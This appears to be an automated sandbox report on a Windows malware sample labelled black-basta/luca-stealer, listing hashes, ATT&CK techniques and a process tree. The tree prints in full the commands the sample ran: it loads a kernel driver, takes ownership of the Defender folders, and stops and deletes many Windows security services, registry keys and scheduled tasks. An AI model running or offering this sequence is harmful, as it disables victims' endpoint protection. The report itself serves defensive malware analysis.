cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57

Analysis

max time kernel
104s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
01/04/2025, 19:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe
Size

327KB
MD5

fda2e2ddccb519a2c1fb72dcaee2de6f
SHA1

efd50828acc3e182aa283c5760278c0da1f428a6
SHA256

cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57
SHA512

28c79ed9a9d5db3920b7e942c66670eec02046fa3d751ad18e9b3597caab76645b194bfa18bb5925ecfb8d201a291a44ee427ef39632f673db39edc43111c3cf
SSDEEP

6144:RTouKrWBEu3/Z2lpGDHU3ykJV9r/R5K7V7NRZfUlyT/8:RToPWBv/cpGrU3yerRKV7feluk

Score

10^/10

defense_evasion discovery execution exploit persistence

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
1708	takeown.exe
1896	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	261.exe

Executes dropped EXE 2 IoCs

pid	Process
2620	261.exe
4880	261.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1708	takeown.exe
1896	icacls.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1672	sc.exe
1576	sc.exe
4648	sc.exe
1912	sc.exe
536	sc.exe
4520	sc.exe
4296	sc.exe
4856	sc.exe
3484	sc.exe
1124	sc.exe
2480	sc.exe
4404	sc.exe
4692	sc.exe
4068	sc.exe
756	sc.exe
392	sc.exe
5088	sc.exe
1744	sc.exe
2588	sc.exe
3408	sc.exe
868	sc.exe
2604	sc.exe
3184	sc.exe
1536	sc.exe
1404	sc.exe
2488	sc.exe
3120	sc.exe
4076	sc.exe
3444	sc.exe
4808	sc.exe
4052	sc.exe
2744	sc.exe
1556	sc.exe
4876	sc.exe
5084	sc.exe
2092	sc.exe
760	sc.exe
3292	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1096	timeout.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3616 wrote to memory of 2620	3616	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe	87
PID 3616 wrote to memory of 2620	3616	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe	87
PID 3616 wrote to memory of 2620	3616	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe	87
PID 2620 wrote to memory of 2668	2620	261.exe	89
PID 2620 wrote to memory of 2668	2620	261.exe	89
PID 2668 wrote to memory of 4880	2668	cmd.exe	91
PID 2668 wrote to memory of 4880	2668	cmd.exe	91
PID 2668 wrote to memory of 4880	2668	cmd.exe	91
PID 4880 wrote to memory of 3980	4880	261.exe	92
PID 4880 wrote to memory of 3980	4880	261.exe	92
PID 3980 wrote to memory of 4856	3980	cmd.exe	94
PID 3980 wrote to memory of 4856	3980	cmd.exe	94
PID 3980 wrote to memory of 4404	3980	cmd.exe	96
PID 3980 wrote to memory of 4404	3980	cmd.exe	96
PID 3980 wrote to memory of 1096	3980	cmd.exe	97
PID 3980 wrote to memory of 1096	3980	cmd.exe	97
PID 3980 wrote to memory of 1576	3980	cmd.exe	99
PID 3980 wrote to memory of 1576	3980	cmd.exe	99
PID 3980 wrote to memory of 4648	3980	cmd.exe	100
PID 3980 wrote to memory of 4648	3980	cmd.exe	100
PID 3980 wrote to memory of 1708	3980	cmd.exe	101
PID 3980 wrote to memory of 1708	3980	cmd.exe	101
PID 3980 wrote to memory of 1896	3980	cmd.exe	102
PID 3980 wrote to memory of 1896	3980	cmd.exe	102
PID 3980 wrote to memory of 2744	3980	cmd.exe	103
PID 3980 wrote to memory of 2744	3980	cmd.exe	103
PID 3980 wrote to memory of 5084	3980	cmd.exe	104
PID 3980 wrote to memory of 5084	3980	cmd.exe	104
PID 3980 wrote to memory of 776	3980	cmd.exe	105
PID 3980 wrote to memory of 776	3980	cmd.exe	105
PID 3980 wrote to memory of 3184	3980	cmd.exe	106
PID 3980 wrote to memory of 3184	3980	cmd.exe	106
PID 3980 wrote to memory of 2092	3980	cmd.exe	107
PID 3980 wrote to memory of 2092	3980	cmd.exe	107
PID 3980 wrote to memory of 3260	3980	cmd.exe	108
PID 3980 wrote to memory of 3260	3980	cmd.exe	108
PID 3980 wrote to memory of 760	3980	cmd.exe	109
PID 3980 wrote to memory of 760	3980	cmd.exe	109
PID 3980 wrote to memory of 1536	3980	cmd.exe	110
PID 3980 wrote to memory of 1536	3980	cmd.exe	110
PID 3980 wrote to memory of 3840	3980	cmd.exe	111
PID 3980 wrote to memory of 3840	3980	cmd.exe	111
PID 3980 wrote to memory of 1744	3980	cmd.exe	112
PID 3980 wrote to memory of 1744	3980	cmd.exe	112
PID 3980 wrote to memory of 3484	3980	cmd.exe	113
PID 3980 wrote to memory of 3484	3980	cmd.exe	113
PID 3980 wrote to memory of 3152	3980	cmd.exe	114
PID 3980 wrote to memory of 3152	3980	cmd.exe	114
PID 3980 wrote to memory of 2588	3980	cmd.exe	115
PID 3980 wrote to memory of 2588	3980	cmd.exe	115
PID 3980 wrote to memory of 1912	3980	cmd.exe	116
PID 3980 wrote to memory of 1912	3980	cmd.exe	116
PID 3980 wrote to memory of 1760	3980	cmd.exe	117
PID 3980 wrote to memory of 1760	3980	cmd.exe	117
PID 3980 wrote to memory of 1404	3980	cmd.exe	118
PID 3980 wrote to memory of 1404	3980	cmd.exe	118
PID 3980 wrote to memory of 3408	3980	cmd.exe	119
PID 3980 wrote to memory of 3408	3980	cmd.exe	119
PID 3980 wrote to memory of 1676	3980	cmd.exe	120
PID 3980 wrote to memory of 1676	3980	cmd.exe	120
PID 3980 wrote to memory of 536	3980	cmd.exe	121
PID 3980 wrote to memory of 536	3980	cmd.exe	121
PID 3980 wrote to memory of 4076	3980	cmd.exe	122
PID 3980 wrote to memory of 4076	3980	cmd.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3616
- C:\Users\Admin\AppData\Local\Temp\261.exe
  "C:\Users\Admin\AppData\Local\Temp\261.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8BD5.tmp\8BD6.tmp\8BD7.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2668
  - - C:\Users\Admin\AppData\Local\Temp\261.exe
      "C:\Users\Admin\AppData\Local\Temp\261.exe" go
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4880
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8C81.tmp\8C82.tmp\8C83.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        5⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:3980
      - C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        6⤵
        Launches sc.exe
        
        PID:4856
      - C:\Windows\system32\sc.exe
        
        sc start ddrver
        6⤵
        Launches sc.exe
        
        PID:4404
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:1096
      - C:\Windows\system32\sc.exe
        
        sc stop ddrver
        6⤵
        Launches sc.exe
        
        PID:1576
      - C:\Windows\system32\sc.exe
        
        sc start ddrver
        6⤵
        Launches sc.exe
        
        PID:4648
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1708
      - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1896
      - C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        6⤵
        Launches sc.exe
        
        PID:2744
      - C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        6⤵
        Launches sc.exe
        
        PID:5084
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        6⤵
        
        PID:776
      - C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        6⤵
        Launches sc.exe
        
        PID:3184
      - C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        6⤵
        Launches sc.exe
        
        PID:2092
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        6⤵
        
        PID:3260
      - C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        6⤵
        Launches sc.exe
        
        PID:760
      - C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        6⤵
        Launches sc.exe
        
        PID:1536
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        6⤵
        
        PID:3840
      - C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        6⤵
        Launches sc.exe
        
        PID:1744
      - C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        6⤵
        Launches sc.exe
        
        PID:3484
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        6⤵
        
        PID:3152
      - C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        6⤵
        Launches sc.exe
        
        PID:2588
      - C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        6⤵
        Launches sc.exe
        
        PID:1912
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        6⤵
        Modifies security service
        
        PID:1760
      - C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        6⤵
        Launches sc.exe
        
        PID:1404
      - C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        6⤵
        Launches sc.exe
        
        PID:3408
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        6⤵
        
        PID:1676
      - C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        6⤵
        Launches sc.exe
        
        PID:536
      - C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        6⤵
        Launches sc.exe
        
        PID:4076
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        6⤵
        
        PID:4540
      - C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        6⤵
        Launches sc.exe
        
        PID:2488
      - C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        6⤵
        Launches sc.exe
        
        PID:4692
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        6⤵
        
        PID:2240
      - C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        6⤵
        Launches sc.exe
        
        PID:868
      - C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        6⤵
        Launches sc.exe
        
        PID:4068
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        6⤵
        
        PID:4660
      - C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        6⤵
        Launches sc.exe
        
        PID:1124
      - C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        6⤵
        Launches sc.exe
        
        PID:1556
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        6⤵
        
        PID:1780
      - C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        6⤵
        Launches sc.exe
        
        PID:3292
      - C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        6⤵
        Launches sc.exe
        
        PID:2604
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        6⤵
        
        PID:2880
      - C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        6⤵
        Launches sc.exe
        
        PID:1672
      - C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        6⤵
        Launches sc.exe
        
        PID:5088
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        6⤵
        
        PID:1564
      - C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        6⤵
        Launches sc.exe
        
        PID:3444
      - C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        6⤵
        Launches sc.exe
        
        PID:4808
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        6⤵
        
        PID:1968
      - C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        6⤵
        Launches sc.exe
        
        PID:756
      - C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        6⤵
        Launches sc.exe
        
        PID:392
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        6⤵
        
        PID:1868
      - C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        6⤵
        Launches sc.exe
        
        PID:3120
      - C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        6⤵
        Launches sc.exe
        
        PID:4052
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        6⤵
        
        PID:1852
      - C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        6⤵
        Launches sc.exe
        
        PID:4520
      - C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        6⤵
        Launches sc.exe
        
        PID:2480
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        6⤵
        
        PID:4460
      - C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        6⤵
        
        PID:2424
      - C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        6⤵
        
        PID:4180
      - C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        6⤵
        
        PID:328
      - C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        6⤵
        
        PID:3016
      - C:\Windows\system32\sc.exe
        
        sc stop ddrver
        6⤵
        Launches sc.exe
        
        PID:4876
      - C:\Windows\system32\sc.exe
        
        sc delete ddrver
        6⤵
        Launches sc.exe
        
        PID:4296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\261.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\8BD5.tmp\8BD6.tmp\8BD7.bat

Filesize
1KB

MD5
e5ddb7a24424818e3b38821cc50ee6fd

SHA1
97931d19f71b62b3c8a2b104886a9f1437e84c48

SHA256
4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

SHA512
450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads